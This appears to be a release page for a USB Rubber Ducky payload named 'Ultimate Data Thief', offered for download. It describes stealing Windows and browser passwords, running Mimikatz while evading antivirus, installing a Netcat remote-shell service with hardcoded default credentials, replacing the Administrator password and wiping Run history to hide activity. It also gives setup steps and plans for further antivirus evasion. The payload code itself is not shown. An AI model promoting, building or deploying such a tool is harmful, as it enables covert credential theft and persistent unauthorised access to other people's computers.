Ultimate Data Thief (DT)
By Lavanoid Volcanic

GIVE THE DUCK POWER!

Features of this payload:
- Backup Windows Logon Passwords (Doesn't work on Windows 8.1).
- Backup saved passwords from Chrome, IE, Firefox etc.
- Get directory listings of common document paths such as Music, Pictures etc.
- Init script support, meaning that you can add batch scripts in the "Init" directory so that DT will execute them.
- Get a visual notification when program has executed (MSG.exe must be integrated in Windows. Usually not available in Windows Home Premium/Home Edition).
- Get a sound notification when program has executed. This can be configured by editing the configuration file.
- Verbose logging of backup process.
- Shut down, reboot or lock system when program execution has completed.
- Replace Administrator password every time the program is run. (Disabled by default)
- Wipe the "Run" dialogue history so it seems that nothing was ever run from it.
- Read a configuration file instead of editing the DT.bat. Configuration file: DT_Configuration.ini
- Integrated Netcat/Nmap to listen on a port (Used for a remote shell). Thanks Shannon Morse for talking about Netcat so much. Netcat will be installed as a Windows service so it has admin access, and it runs upon Windows startup. Default username and password: Lavanoid (Username), LavanoidVolcanic (Password).
- Run Mimikatz without AV detection, using PowerSploit to accomplish this - Requested by MB60893. Thank you soooo much MB60893! An internet connection is currently required to run this feature.
- Listing of workgroups and domains on the local network.
- Customised NetCat remote command line.
- Unmount the payload storage once execution of DT has completed.
- Anything else?

Other new things:
- Edited the Compiler.bat to support SCRIPT_EX.bat
- Edited the payloads located in Scripts\Payloads
- Backup IE, Firefox, Opera etc.
- Cleaner DT.bat file, re-wrote the whole script for the 3rd time. Much smaller and tidier now.
- The NetCat Terminal.bat uses a hashing algorithm for the password. Old Terminal.bat configuration files WILL be deleted since they WON'T work with the newer version.

Other features of this program:
- Checking of main files located in \Res. Checked with a size verification and Sha1Sum (Sha1Sum used in v2.1+)
- Re-wrote/Re-writing everything from scratch, with more variables that can be triggered/changed, as well as a major tidy up. Everything is much cleaner than it was before.
- Added an "API", as I like to call it, to check files with a Sha1Sum verification. Usage: call :DT_Sha1Sum_Check_Compact "File name/path" "Expected Sha1Sum"
- In version 2.2, I also added a script that adds a firewall entry for netcat. Why didn't I do that in the first place?
- No longer need to use SCRIPT_EX.exe.

Plans for later versions:
- Combining all EXEs together then encrypt them to avoid AV.
- Faster execution.
- Backup more programs.
- Add more cool features to show who's boss.
- Encrypt all the programs located in \Res so AV can't detect them and neither will they have to be stored in an encrypted zip archive.

Known issues:
- Slow at "Backing up" data - this is simply because DT has to extract the required data from an encrypted zip archive. An attempt to avoid AV.

Notes:
- New features are added in my free time. I'm usually busy so patience is most appreciated.
- Default username and password for the remote netcat login: Username: Lavanoid, Password: LavanoidVolcanic
- DON'T FORGET TO CHECK THE CONFIGURATION IN DT_Configuration.ini! You can open DT_Configuration.ini in any text editor. I personally use Notepad++ since it makes batch programming seem more fun.

Payload (optimized for the 4CAP firmware):

Payload (Optimized for the dual duck firmware by having a delay at the start):

WANT FASTER EXECUTION? NO PROBLEM! Here's a payload that you can encode to execute DT even faster!
I would have integrated it into Installer.bat but Microsoft's batch language is really stupid so it won't write part of the script properly.

Faster payload:

If you are using a different firmware, besides one that waits for a key to be pressed, you may want to set a delay at the start of the above payload. I recommend DELAY 15000.

This payload requires extra data to dump information, so you need to download all the files in the link below. Download the zip file and extract it on your desktop, then run the "Installer.bat". The installer will ask you questions to help you configure the duck and the payload. Once installed, you can re-insert the duck and the payload will be ready.

Recommended Ducky Firmware: 4CAP - I recommend this firmware because Windows can take its time installing drivers (especially on netbooks), so if Windows exceeds the delay time by installing drivers, then it wouldn't matter because as soon as you know that the drivers are installed - just press Caps lock 4 times. No time wasted :D

DOWNLOADS!
Link to 4CAP: Here
Payload and data dumping programs: Here (Dropbox) or Here (GitHub)

Have fun!

Disclaimer (a typical one) - I'm not responsible for any turn out. If you run this payload or any of the other programs included within the zip archive - then you accept FULL responsibility. I highly doubt that this payload and the programs will damage your system, but a disclaimer is always good to reassure developers.

WARNING! For those of you who are upgrading from 2.4 to 2.5 - remove the NetCat.bat file located in Data\Init as the installer has been integrated into DT.bat

REMEMBER: EDIT THE CONFIGURATION FILE BEFORE EXECUTING THIS PAYLOAD!

GREAT NEWS!! I've been reviewing some of the code for DT and I've decided to make it even better. I've already made a lot of changes to the DT.bat and NetCat Terminal.bat BUT I'M NOT FINISHED! I'M JUST GETTING STARTED! Why not let the duck disable all other HID devices?
I've already found some great programs that will allow me to accomplish this, now I just have to write the scripts! Unfortunately, I'm running Ubuntu (latest version) so since I am not running Windows, I am not able to execute my goals of making this payload better. I could write the script using text editors installed on Ubuntu but it just isn't the same as writing with Notepad++, nor can I test it afterwards.

PATIENCE IS THE ESSENCE! My goal is to bring you the best payload possible! I want as many features as possible!

I would really appreciate it if you leave a comment! Every comment counts (Negative comments are NOT appreciated however)